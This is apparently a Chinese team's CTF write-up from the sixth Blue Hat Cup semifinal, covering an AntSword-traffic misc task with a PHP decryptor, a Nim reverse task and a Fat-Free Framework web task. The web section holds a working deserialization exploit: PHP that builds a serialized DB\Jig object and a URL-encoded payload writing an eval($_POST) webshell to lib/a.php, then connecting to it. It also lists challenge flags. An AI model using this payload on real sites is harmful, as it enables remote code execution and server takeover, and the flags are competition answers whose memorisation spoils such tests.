[ CTF ]【天格】战队WriteUp-第六届”蓝帽杯“全国大学生网络安全技能大赛(半决赛)
第六届”蓝帽杯“全国大学生网络安全技能大赛(半决赛)电子取证赛题
第六届”蓝帽杯“全国大学生网络安全技能大赛(半决赛)其他赛题
【Misc】加密的通道
![[ CTF ]【天格】战队WriteUp-第六届”蓝帽杯“全国大学生网络安全技能大赛(半决赛)_第1张图片](http://img.e-com-net.com/image/info8/33ceef9a066f4123b4e4a112d5e28ef1.jpg)
1、经过wireshark分析发现是蚁剑流量
![[ CTF ]【天格】战队WriteUp-第六届”蓝帽杯“全国大学生网络安全技能大赛(半决赛)_第2张图片](http://img.e-com-net.com/image/info8/b5072398a04845b4ad7ea60c603de413.jpg)
2、在http请求中有哈希文本
3、尝试几轮后发现是加密的PHP,使用zym解密
参考文章:[Web逆向] PHP解密:zym加密 带乱码调试过程
exp.php
function decrypt($data, $key)
{
$data_1 = '';
for ($i = 0; $i < strlen($data); $i++) {
$ch = ord($data[$i]);
if ($ch < 245) {
if ($ch > 136) {
$data_1 .= chr($ch / 2);
} else {
$data_1 .= $data[$i];
}
}
}
$data_1 = base64_decode($data_1);
$key = md5($key);
$j = $ctrmax = 32;
$data_2 = '';
for ($i = 0; $i < strlen($data_1); $i++) {
if ($j <= 0) {
$j = $ctrmax;
}
$j--;
$data_2 .= $data_1[$i] ^ $key[$j];
}
return $data_2;
}
function find_data($code)
{
$code_end = strrpos($code, '?>');
if (!$code_end) {
return "";
}
$data_start = $code_end + 2;
$data = substr($code, $data_start, -46);
return $data;
}
function find_key($code)
{
// $v1 = $v2('bWQ1');
// $key1 = $v1('??????');
$pos1 = strpos($code, "('" . preg_quote(base64_encode('md5')) . "');");
$pos2 = strrpos(substr($code, 0, $pos1), '$');
$pos3 = strrpos(substr($code, 0, $pos2), '$');
$var_name = substr($code, $pos3, $pos2 - $pos3 - 1);
$pos4 = strpos($code, $var_name, $pos1);
$pos5 = strpos($code, "('", $pos4);
$pos6 = strpos($code, "')", $pos4);
$key = substr($code, $pos5 + 2, $pos6 - $pos5 - 2);
return $key;
}
$input_file = $argv[1];
$output_file = $argv[1] . '.decrypted.php';
$code = file_get_contents($input_file);
$data = find_data($code);
if (!$code) {
echo '未找到加密数据', PHP_EOL;
exit;
}
$key = find_key($code);
if (!$key) {
echo '未找到秘钥', PHP_EOL;
exit;
}
$decrypted = decrypt($data, $key);
$uncompressed = gzuncompress($decrypted);
// 由于可以不勾选代码压缩的选项,所以这里判断一下是否解压成功,解压失败就是没压缩
if ($uncompressed) {
$decrypted = str_rot13($uncompressed);
} else {
$decrypted = str_rot13($decrypted);
}
file_put_contents($output_file, $decrypted);
echo '解密后文件已写入到 ', $output_file, PHP_EOL;
使用
php exp.php decode.php
decode.php为需要解密的文件,得到rsa.php
4、赛后总结发现
貌似直接导出http也是可以的,然后把各个参数丢进去解密输出后第一个参数base64解密后就是flag
flag{844dfc86da23a4d5283907efaf9791ad}
【Reverse】babynim
1、在NimMainModule函数中
![[ CTF ]【天格】战队WriteUp-第六届”蓝帽杯“全国大学生网络安全技能大赛(半决赛)_第3张图片](http://img.e-com-net.com/image/info8/60ece664d39c47748d0681b88c1f2bc3.jpg)
2、比对格式、判断长度
![[ CTF ]【天格】战队WriteUp-第六届”蓝帽杯“全国大学生网络安全技能大赛(半决赛)_第4张图片](http://img.e-com-net.com/image/info8/28b1ee943882435694ccecc6d3b36b08.jpg)
3、取中间的36位出来
![[ CTF ]【天格】战队WriteUp-第六届”蓝帽杯“全国大学生网络安全技能大赛(半决赛)_第5张图片](http://img.e-com-net.com/image/info8/2c91b270a5e54b78800d866c393dd625.jpg)
![[ CTF ]【天格】战队WriteUp-第六届”蓝帽杯“全国大学生网络安全技能大赛(半决赛)_第6张图片](http://img.e-com-net.com/image/info8/11ca1af151314286bc6f01b4758657f9.jpg)
4、算法就是 flag*e==enc
e=560063927934284409650605943439557376388765529190415191934763442152260285492096
72868995436445345986471
m=517484091195714939273140476977992136412862788940498402288045942239883725017828
94889443165173295123444031074892600769905627166718788675801
print((m//e))
flag{923973256239481267349126498121231231}
【Web】easyfatfree
1、扫描发现
![[ CTF ]【天格】战队WriteUp-第六届”蓝帽杯“全国大学生网络安全技能大赛(半决赛)_第7张图片](http://img.e-com-net.com/image/info8/c13562eeca484db6b456f2761113a289.jpg)
![[ CTF ]【天格】战队WriteUp-第六届”蓝帽杯“全国大学生网络安全技能大赛(半决赛)_第8张图片](http://img.e-com-net.com/image/info8/fade337fe56a4e9d91bb80ae8df21efd.jpg)
2、.DS_Store
参考
![[ CTF ]【天格】战队WriteUp-第六届”蓝帽杯“全国大学生网络安全技能大赛(半决赛)_第9张图片](http://img.e-com-net.com/image/info8/f5ad9d010ef94cd28f35cdad9ec96b05.jpg)
我不会,所以并没有什么用
3、下载源码看看
![[ CTF ]【天格】战队WriteUp-第六届”蓝帽杯“全国大学生网络安全技能大赛(半决赛)_第10张图片](http://img.e-com-net.com/image/info8/fb3f59bb86ca4609929ec9f4c0fb2fd8.jpg)
4、代码审计后发现lib文件夹有写入权限,写反序列化
namespace DB;
error_reporting(0);
highlight_file(__FILE__);
class Jig
{
const
FORMAT_JSON=0,
FORMAT_Serialized=1;
protected $uuid, $dir, $format, $log, $data, $lazy;
function __construct()
{
$this->lazy=true;
$this->data=["/a.php"=>[""]];
$this->format=self::FORMAT_Serialized;
$this->dir="lib";
}
}
echo urlencode(serialize(new Jig()));
?>
运行结果:
O%3A6%3A%22DB%5CJig%22%3A6%3A%7Bs%3A7%3A%22%00%2A%00uuid%22%3BN%3Bs%3A6%3A%22%00%2A%00dir%22%3Bs%3A3%3A%22lib%22%3Bs%3A9%3A%22%00%2A%00format%22%3Bi%3A1%3Bs%3A6%3A%22%00%2A%00log%22%3BN%3Bs%3A7%3A%22%00%2A%00data%22%3Ba%3A1%3A%7Bs%3A6%3A%22%2Fa.php%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A26%3A%22%3C%3Fphp+eval%28%24_POST%5B%271%27%5D%29%3B%3F%3E%22%3B%7D%7Ds%3A7%3A%22%00%2A%00lazy%22%3Bb%3A1%3B%7D
5、主页payload提交,在lib文件夹下写入一句话
http://xxx.xxx.xxx.xxx:xxxx/?payload=O%3A6%3A%22DB%5CJig%22%3A6%3A%7Bs%3A7%3A%22%00%2A%00uuid%22%3BN%3Bs%3A6%3A%22%00%2A%00dir%22%3Bs%3A3%3A%22lib%22%3Bs%3A9%3A%22%00%2A%00format%22%3Bi%3A1%3Bs%3A6%3A%22%00%2A%00log%22%3BN%3Bs%3A7%3A%22%00%2A%00data%22%3Ba%3A1%3A%7Bs%3A6%3A%22%2Fa.php%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A26%3A%22%3C%3Fphp+eval%28%24_POST%5B%271%27%5D%29%3B%3F%3E%22%3B%7D%7Ds%3A7%3A%22%00%2A%00lazy%22%3Bb%3A1%3B%7D
6、中国蚁剑连接后在根目录下拿到flag
url:
http://xxx.xxx.xxx.xxx:xxxx/lib/a.php
【Forensic】
别问,所有做出来的选择题填空题都是我蒙的,以前没接触过
今后加强学习,下次蓝帽再来了